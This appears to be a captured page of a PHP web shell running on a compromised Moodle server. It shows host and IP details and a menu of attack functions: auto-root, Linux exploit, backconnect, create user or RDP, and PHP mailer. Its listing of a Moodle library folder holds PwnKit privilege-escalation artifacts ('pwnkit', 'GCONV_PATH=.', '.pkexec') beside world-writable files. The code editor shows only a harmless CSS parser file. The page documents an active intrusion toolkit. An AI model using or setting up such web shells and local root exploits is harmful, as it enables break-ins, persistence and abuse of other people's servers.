Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lib /
php-css-parser /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
CSSList
[ DIR ]
drwxrwxrwx
Comment
[ DIR ]
drwxrwxrwx
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
Parsing
[ DIR ]
drwxrwxrwx
Property
[ DIR ]
drwxrwxrwx
Rule
[ DIR ]
drwxrwxrwx
RuleSet
[ DIR ]
drwxrwxrwx
Value
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
OutputFormat.php
8.55
KB
-rwxrwxrwx
Parser.php
886
B
-rwxrwxrwx
Renderable.php
189
B
-rwxrwxrwx
Settings.php
1.31
KB
-rwxrwxrwx
moodle_readme.txt
371
B
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Parser.php
<?php namespace Sabberworm\CSS; use Sabberworm\CSS\CSSList\Document; use Sabberworm\CSS\Parsing\ParserState; /** * Parser class parses CSS from text into a data structure. */ class Parser { private $oParserState; /** * Parser constructor. * Note that that iLineNo starts from 1 and not 0 * * @param $sText * @param Settings|null $oParserSettings * @param int $iLineNo */ public function __construct($sText, Settings $oParserSettings = null, $iLineNo = 1) { if ($oParserSettings === null) { $oParserSettings = Settings::create(); } $this->oParserState = new ParserState($sText, $oParserSettings, $iLineNo); } public function setCharset($sCharset) { $this->oParserState->setCharset($sCharset); } public function getCharset() { $this->oParserState->getCharset(); } public function parse() { return Document::parse($this->oParserState); } }
Close